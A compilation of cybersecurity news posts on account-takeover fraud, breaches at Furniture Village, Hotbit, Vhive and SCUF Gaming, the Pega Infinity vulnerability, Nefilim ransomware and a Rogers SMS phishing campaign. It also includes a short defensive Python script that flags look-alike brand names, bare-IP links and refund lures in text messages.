According to MarketWatch, "Ari Jacoby, chief executive and co-founder of cybersecurity firm Deduce, backed up this statement with data showing that account-takeover fraud increased by roughly 250% from 2019 to 2020. He told Security.org that account-takeover prevention is a $15 billion market that is “growing significantly year-over-year.“" FINRA identifies two factors that may be behind the surge in account takeovers. 

The first is the increased use of online services and brokerage apps, which lets hackers break into user accounts with login IDs and passwords bought on the dark web. Finding customers' credentials is easy because many users reuse the same password across multiple accounts. The second is COVID-19. "Customer account-takeovers have been a recurring issue, but reports to FINRA about such attacks have increased as more firms offer online accounts, and as more investors conduct transactions in these accounts. In part due to the proliferation of mobile devices and applications and the reduced accessibility of firm’s physical locations due to the COVID-19 pandemic," FINRA reports. 

The Securities and Exchange Commission is also watching the issue and is pressing brokerage firms over their failure to monitor suspicious activity. MarketWatch says "But most individual investors don’t have to wait for the SEC or FINRA to come to their rescue, because this sort of criminal activity is largely enabled by a lack of vigilance on the part of victims, including requesting that their broker send them suspicious login alerts and using two-factor authentication, according to Jacoby."

Furniture Village Hit by a Week-Long Cyber Attack

 

Customers have been left 'with nothing to sit on' and unable to pay while waiting for sofas, beds, and tables as a result of a week-long cyber-attack on Furniture Village. The Slough-based store revealed yesterday that it had been the 'subject of a cybersecurity attack,' but that 'to the best of its knowledge,' no customer data had been disclosed. 

Internal systems are temporarily down, according to the company's website, although orders are still being taken online and in stores. The problem surfaced six days ago, on May 29, when Furniture Village said its systems were experiencing technical difficulties and its phone lines were down. 

Customers have been complaining on social media for over a week about being unable to get refunds or reach customer service, as well as delayed or cancelled deliveries. The company acknowledged in a tweet that deliveries are taking longer than normal because its 'warehouses are currently operating manually.' 

In a statement released yesterday, Furniture Village said: "Frustratingly, our company was recently the target of a cybersecurity attack, however, by immediately implementing security protocols, including shutting down the affected systems, we were able to restrict the scope of the attack. Thankfully, to the best of our knowledge, no personal data has been lost or compromised." 

"We're working around the clock to restore all system-related functions of the business as soon as it’s safe to do so. The business remains healthy, and our teams are focused on supporting our customers, resorting to manual processes where necessary," the company added. 

The precise nature of the attack is unknown at this time; however, some industry experts suspect the retailer was the victim of a ransomware campaign. No formal confirmation has been given as to whether law enforcement agencies have been alerted. 

The National Crime Agency of the United Kingdom released its 2021 National Strategic Assessment last week, claiming that criminals are using technological advancements to fuel "serious and organised crime." Ransomware assaults have "grown in frequency and impact," according to the report.

"It is estimated 50 percent of all ransomware attacks included a threat to publish stolen data and over the last year there were £3bn of estimated fraud losses for UK individuals and businesses, but an accurate figure is constrained by significant under-reporting," it said.

Researchers Flag Serious Authentication Bypass Vulnerability After Pega Infinity Hotfix Released

 

After security researchers discovered a flaw in the Pega Infinity enterprise software platform, users are being advised to upgrade their installations. 

CVE-2021-27651 is a critical-risk vulnerability in Pega's Infinity program versions 8.2.1 to 8.5.2, according to the research team of Sam Curry, Justin Rhinehart, Brett Buerhaus, and Maik Robert. 

The proof-of-concept shows how an intruder can circumvent Pega Infinity's password reset system. Using the reset account, attackers could then reach administrator-only remote code execution and "fully compromise" the Pega instance, including modifying complex pages or templating. The researchers collaborated with the developer, Pegasystems, to construct a hotfix. According to the vendor, customers running the program on-premises should check whether their version is affected and apply the relevant hotfix. 

With over 2,000 users, Pega Infinity is a common enterprise software suite. Customer service and sales automation, an AI-driven ‘customer decision hub,' workforce intelligence, and a ‘no-code' development platform are all included in the kit. The Pega Infinity vulnerability was discovered as a result of the security researchers' involvement in Apple's bug bounty program. 

“We’d been hacking on Apple's bug bounty program for about six months and had spent a lot of time on software produced by Apple themselves,” UK-based hacker Sam Curry told The Daily Swig. 

“After reading a blog post from two amazing researchers, we agreed to take a different approach and target vendors [supplying technology to Apple].” Curry has written about his experiences with Apple's bug bounty program in the past. 

The researchers used Burp Suite to find the password reset flaw in Pega Infinity. According to Curry, it allows a complete compromise of any Pega instance with "no prerequisite information." Justin Rhinehart also developed a Nuclei template for determining whether a given host is running Pega Infinity. 

“Pega's customers are from every sector and at the time of reporting some of the customers included the FBI, US Air Force, Apple, American Express, and a few other huge names.” 

Curry states that Pega was able to collaborate with the researchers to patch the flaw, although they needed time for customers using Infinity on-premises to upgrade their installations. Curry mentioned that the procedure took more than three months.

Amazon Fake Reviews Scam Exposed in Data Breach

The identities of over 200,000 people who appear to be participating in Amazon fraudulent product review schemes have been exposed by an open database. 

There is an ongoing struggle between the e-commerce giant and shady traders all over the world who want to hamstring rivals and gain an advantage by creating fake product feedback. The ways in which they function and remain under Amazon's radar differ, but an open ElasticSearch server has revealed some of their inner workings. 

Researchers from Safety Detectives reported on Thursday that the server, which was publicly accessible online, held 7GB of data and over 13 million records that appeared to be connected to a widespread fake review scam. It is unknown who owns the server, but messages written in Chinese that were exposed in the incident suggest the company might be based in China. 

The database includes user names, email addresses, PayPal addresses, links to Amazon accounts, and WhatsApp and Telegram numbers, as well as records of direct messages between consumers willing to provide false reviews and traders willing to pay them. The leak may implicate "more than 200,000 people in unethical activities," according to the team. 

The database, and the messages it contained, exposed the strategies used by suspicious sellers. In one approach the vendor sends a customer a link to the products for which it wants 5-star ratings, and the customer makes a purchase. After a few days, the customer leaves a positive review and messages the vendor, who pays via PayPal, sometimes framed as a 'refund,' while the customer keeps the item for free. Such paid reviews are harder to spot because the refund payments are made outside the Amazon platform. 

On March 1, an open ElasticSearch server was discovered, but the owner could not be identified. On March 6, however, the leak was detected and the server was secured. 

"The server could be owned by a third-party that reaches out to potential reviewers on behalf of the vendors [or] the server could also be owned by a large company with several subsidiaries, which would explain the presence of multiple vendors," the researchers speculated. "What's clear is that whoever owns the server could be subject to punishments from consumer protection laws, and whoever is paying for these fake reviews may face sanctions for breaking Amazon's terms of service." 

Vendors are not allowed to review their own goods or offer a "cash incentive, discount, free products, or other compensation" in exchange for positive reviews, according to an Amazon spokesperson and the company's review policy, which also covers third-party organizations. However, because Amazon is such a popular online marketplace, some vendors are likely to keep trying to game its review system to increase their profits. 

"We want Amazon customers to shop with confidence, trusting that the reviews they read are genuine and appropriate," a spokesperson for the company said. "We have clear policies for both reviewers and selling partners that forbid the misuse of our community features, and we suspend, ban, and taint people who break them."

Hackers Target Rogers With a New SMS Phishing Campaign

 

Rogers Communications Inc. is advising Canadians to be wary of SMS phishing scams that promise to refund consumers for a system outage that occurred earlier last week. Users were unable to use cellular voice and data networks after the network experienced a nationwide blackout a week ago. Threat actors are also sending fraudulent text messages to recipients, instructing them to click on a link to receive a rebate. 

An SMS circulated on social media falsely reports that “R0GERS WIRELESS INC.” (spelled with a zero instead of an O) is providing a $50 credit to anyone who clicks on a link provided.

Rogers Communications Inc. is a communications and publishing corporation based in Canada. Alongside substantial telecommunications and mass media infrastructure, it operates mainly in wireless communications, cable television, telephony, and Internet connectivity. Rogers' headquarters are in Toronto, Ontario. While the business dates back to 1925, when Edward S. Rogers Sr. formed Rogers Vacuum Tube Company to market batteryless radios, the current venture dates to 1960, when Ted Rogers and a partner purchased the CHFI-FM radio station and then became part-owners of a consortium that created the CFTO television station.

Rogers replied that it never sends credit alerts via text message and advises anyone who receives one to ignore the embedded link. Furthermore, the credit amount will vary based on the cellular plan and will not include a registration link, according to the company. 

According to Ericsson, the 16-hour wireless system blackout on April 19th was triggered by a software update that caused devices to be disconnected from the network. A message from Rogers CTO Jorge Fernandes to customers the next day said, "We have addressed the software issue and our engineering and technical teams will continue to work around the clock with the Ericsson team to restore full services for our customers." 

The links in these texts all point to websites hosted on a bare IP address rather than a domain name. Because the pages have all been taken offline, it is unclear exactly what information was phished, but they were clearly after Rogers customers' personal and account information. 

Rogers is aware of the scam and has advised users to "forward the content of the SMS to 7726 (SPAM), to register it for investigation/blocking from the network," according to a tweet from the company.
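The indicators described in this post (a brand name spelled with a digit in place of a letter, a monetary lure, and a link whose host is an IP address rather than a domain) can be turned into a simple triage check. The following Python is an added illustration, not code from Rogers or from the original post; the brand list, substitution table and sample messages are constructed assumptions.

```python
"""Heuristic triage of SMS text for the smishing traits described above:
a brand name spelled with look-alike digits, a money lure, and a link whose
host is a bare IP literal instead of a domain. Defender-side scoring only."""
import ipaddress
import re
from urllib.parse import urlparse

# Brands a (hypothetical) carrier abuse desk wants to protect. Assumption.
PROTECTED_BRANDS = {"rogers"}

# Digits and symbols commonly substituted for letters in look-alike names.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                            "5": "s", "7": "t", "@": "a", "$": "s"})

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
LURE_RE = re.compile(r"\b(credit|refund|rebate|reimburse\w*)\b|\$\s?\d+",
                     re.IGNORECASE)


def lookalike_brands(text):
    """Return brand names that only appear after homoglyph normalisation,
    e.g. 'R0GERS' normalises to 'rogers' but the raw token is not 'rogers'."""
    hits = set()
    for token in re.findall(r"[A-Za-z0-9@$]+", text):
        normalised = token.lower().translate(HOMOGLYPHS)
        if normalised in PROTECTED_BRANDS and token.lower() != normalised:
            hits.add(normalised)
    return hits


def bare_ip_links(text):
    """Return URLs in the text whose host is an IP literal, not a domain."""
    found = []
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname  # strips scheme, port, userinfo, [ ]
        if host is None:
            continue
        try:
            ipaddress.ip_address(host)
        except ValueError:
            continue  # a normal hostname; not what we are looking for
        found.append(url)
    return found


def triage(message):
    """Score one SMS. Returns (score, indicators); two or more indicators
    together are treated as likely smishing."""
    indicators = []
    brands = lookalike_brands(message)
    if brands:
        indicators.append("lookalike-brand:" + ",".join(sorted(brands)))
    if bare_ip_links(message):
        indicators.append("bare-ip-link")
    if LURE_RE.search(message):
        indicators.append("money-lure")
    return len(indicators), indicators


def is_suspicious(message):
    return triage(message)[0] >= 2


# Constructed sample messages modelled on the post; not real captured SMS.
SAMPLES = {
    "lure": "R0GERS WIRELESS INC.: You are eligible for a $50 credit for the "
            "outage. Claim here: http://203.0.113.7/claim",
    "benign": "Rogers: Your bill is ready. View it in the MyRogers app.",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, triage(text))
```

The sample "lure" message trips all three checks, while the plain notification trips none; a real deployment would feed the 7726 report stream through the same function.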

Hotbit Shut Down all Services After a Cyberattack

 

After an alleged cyberattack on Thursday, cryptocurrency trading site Hotbit has shut down all of its services. A note on the platform's website reads, “Hotbit just suffered a serious cyber-attack starting around 08:00 PM UTC, April 29, 2021, which led to the paralysation of a number of some basic services.”   

While the hackers were unable to gain access to Hotbit's wallets, they were able to penetrate the platform's user database. The Hotbit team told customers to ignore all contact from people claiming to be members of the exchange. Hotbit said that, with all regular activity suspended during the ongoing maintenance, pending trading orders had been cancelled to avoid losses, and it agreed to cover any losses incurred by exchange-traded funds listed on its website during the downtime.

Before restoring servers and facilities, the exchange is looking for any evidence of computer tampering that may have contaminated any of the frequently backed up data. Due to the time required to review backup data before beginning the system restoration process, customers were advised that the investigation and recovery process could take anything from 7 to 14 days. 

The attackers have obtained access to plain text customer information (phone number, email address, and asset data) contained in Hotbit's servers, according to the company. Despite the fact that customers' passwords and 2FA keys were secured, the exchange advised consumers to update their passwords on all other web sites where they used the same credentials. 

Alex Zhou, Hotbit's chief security officer, told users on the exchange's Telegram group that customer funds were unaffected by the attack, saying: “The attacker tried to break into the wallet server to steal funds but the action was identified and blocked successfully by Hotbit risk control system. All users’ funds are safe. At the same time, Hotbit is in the process of transferring all funds in hot wallet to cold wallet, the details of the whole integration could be seen on the chain,” he said. 

Data from the Ethereum transaction tracking platform Etherscan show multiple token outflows from one of Hotbit's established wallets to another address that currently holds around $14 million in various altcoins.

According to comments on social media and in the platform's Telegram forum, the length of time provided for the maintenance is causing considerable unrest among Hotbit users.

Furniture Retailer Vhive's Data Breach: Customer Information Leaked Online, Under Investigation

 

Police are investigating a data breach at local furniture retailer Vhive in which customers' personal information, such as phone numbers and physical addresses, was leaked online. In response to questions from The Straits Times on Saturday, April 3, police confirmed that a report had been filed on the matter.

According to the company, information compromised in the hack includes customers' names, physical and e-mail addresses, and mobile numbers, but it did not include identification numbers or financial information.

In a Facebook post on March 29, Vhive announced that its server was hacked on March 23 and that it was working with police and other relevant agencies, as well as IT forensic investigators, to investigate the breach. 

"All financial records in relation to purchases made with Vhive are held on a separate system which was not hacked," said Vhive. 

"We are truly sorry for the incident and stand ready to assist you if you require immediate help," Vhive told customers. 

According to ST's checks on Saturday afternoon, Vhive's e-mail servers were also compromised. The website only displayed a warning of the cyber attack, while the company's stores on the online shopping platforms Lazada and Shopee were open for business. 

The Altdos hacking group, which operates mainly in Southeast Asia, has claimed responsibility for the breach. In an email to affected customers on Saturday, Altdos said it had hacked into Vhive three times in nine days and claimed to have stolen information of over 300,000 customers as well as nearly 600,000 transaction records. 

The group announced that it will publish 20,000 customer records daily until its demands to Vhive’s management are met. In its Facebook statement, Vhive said it would be closely guided by the forensic investigator and authorities on the steps to protect its systems and ensure that customers can conduct transactions securely. 

In previous hacking incidents, Altdos has stolen customer data from companies, blackmailed the compromised company, leaked the data online if its requirements were not met, and publicized the violations. The cyberattacks were mainly focused on stock exchanges and financial institutions. 

In January, Altdos claimed to have broken into the IT infrastructure of the Bangladeshi conglomerate Beximco Group and stole data from 34 of its databases. 

Last December, it hacked a Thai securities trading firm and posted the stolen data online when the firm allegedly failed to acknowledge its emails and claims.

Nefilim Ransomware Evolving Rapidly: Top Targets at a Glance


Ransomware continues to grow in both threat and reach as threat actors devise fresh methods of introducing new ransomware variants and malware families. One newly emerged example, Nefilim, was first identified at the end of February 2020 and threatens to publish victims' data if they do not pay the ransom. Its code closely resembles that of Nemty 2.5 Revenge ransomware, and it is most likely distributed via exposed Remote Desktop Protocol, according to Vitali Kremez, an ethical hacker at SentinelLabs.

Earlier this month, researchers from threat intelligence firm Cyble discovered a post by the authors of Nefilim ransomware claiming to have hacked The SPIE Group, an independent European market leader for technical services in the field of energy. In the post, the operators claim to possess around 11.5 GB of the company's sensitive data, including corporate operational documents such as telecom services contracts, dissolution legal documents, infrastructure group reconstruction contracts and more.

Since April 2020, Nefilim has targeted multiple organizations around the globe, concentrated in South Asia, South America, Oceania, North America, and Western Europe. Going by the count of publicly disclosed attacks, manufacturing is the industry most targeted by the operators of Nefilim ransomware; Mas Holdings, Fisher & Paykel, Aban Offshore Limited and Stadler Rail were some of the major targets. Other industries hit by Nefilim are communications and transportation, with Orange S.A. and Toll Group and Arteris SA among the top targets respectively. Notably, no organization from the healthcare or education sectors has been targeted so far.

Nefilim uses a number of delivery routes, including P2P file sharing, free software, spam email, torrent websites, and malicious websites, to infiltrate organizations' IT systems. Designed specifically for Windows PCs, Nefilim actively abuses Remote Desktop Protocol as its primary attack vector. It encrypts the target's data with a combination of two algorithms, AES-128 and RSA-2048, and stolen data is later leaked on the operators' site, known as Corporate Leaks, when victims fail to pay the ransom.

Users are advised to be wary of exposed ports, and security teams should ensure that unused ports are closed. Experts have also recommended limiting login attempts for Remote Desktop Protocol administrative access in the relevant settings.

'ShinyHunters', a Hacker Group Selling Databases of 10 Organization on the Dark Web for $18,000


A group of hackers has put the user databases of 10 companies up for sale on the dark web, a part of the internet that requires specialized software to access and is not normally indexed by search engines. 

The group, which is selling more than 73.2 million user records, goes by the name 'ShinyHunters' and was reportedly behind the breach of Indonesia's biggest online store, Tokopedia. Notably, the success of the Tokopedia breach appears to have encouraged the hackers to steal and sell data from various organizations, including Zoosk (online dating app, 30 million records), Minted (online marketplace, 5 million records), Chatbooks (printing service, 15 million records), Mindful (health magazine, 2 million records), Bhinneka (Indonesian online store, 1.2 million records), Home Chef (food delivery service, 8 million records) and others. The hackers have shared samples of the stolen records, and security experts have verified them to confirm the authenticity of most of the databases, which are being sold separately for a combined total of almost $18,000. However, the legitimacy of some of the listed user records is yet to be proved. Despite the uncertainty, ShinyHunters appears to be a well-founded threat actor according to community sources. 

In the last week's breach targeting Tokopedia, initially, hackers published 15 million user records for free, however, later on, the organization's full database containing around 91 million records was put on sale for $5,000. 

Allegedly the hacker group has also been involved in the data breach of a very popular Facebook-funded education initiative, Unacademy, the breach affected a total of 22 million user records. 

Reports indicate that the data posted by the hackers contains authentic databases that could lead to serious concerns for all the affected organizations. Although there are limited insights into ShinyHunters, the group's modus operandi resembles that of Gnosticplayers, a hacking group that made headlines for selling stolen data on the dark web, with its latest victim being Zynga Inc, a mobile social game company.

1.1 Million Customers Records of SCUF Gaming Exposed Online


The database of more than 1 million customers was exposed online by 'SCUF Gaming', a subsidiary of Corsair that develops high-end gamepads for Xbox, PS4, and PC. The incident led to the exposure of clients' names, payment info, contact info, repair tickets, order histories, and other sensitive information. Other data belonging to the company's staff and internal API keys were also compromised as a result.

The data was left unprotected for two days before being discovered by the security researcher, Bob Diachenko who reported the same to Scuf Gaming. The team led by the researcher found the data on the web without any password protection or authentication.

The company took the database down less than two hours after being notified. In the meantime, bot crawlers had enough time to locate the exposed database, and a ransom note was found demanding 0.3 BTC from the company. The note claims that the data had been downloaded by the cybercriminals, although no such download was detected by the company's systems. "Your Database is downloaded and backed up on our secured servers. To recover your lost data, Send 0.3 BTC to our BitCoin Address and Contact us by eMail,” the note read.

Experts believe the criminals involved did not have enough time to delete or encrypt the data in the database, so it is unlikely that they were able to download it either. However, SCUF clients and staff could face a risk of phishing attacks, identity theft, and fraud from cybercriminals who may have downloaded some pieces of the leaked database.

In a conversation with Comparitech, a spokesperson for Corsair, parent company to SCUF gaming told, “…Once notified, we identified the root cause of this exposure and secured the database within two hours. While investigating Mr. Diachenko’s warning, we also discovered that a bot had connected to the database’s server and placed a ransom note there. We have no evidence that either the bot or any other actor was able to misappropriate customer data.

This issue was specific to one system, being operated off-site due to work-from-home precautions resulting from the current COVID-19 pandemic.”

To stay on the safe side, SCUF Gaming customers are advised to watch for any suspicious activity on their bank accounts, as scammers who gathered whatever bits of information they could are likely to attempt targeted phishing attacks.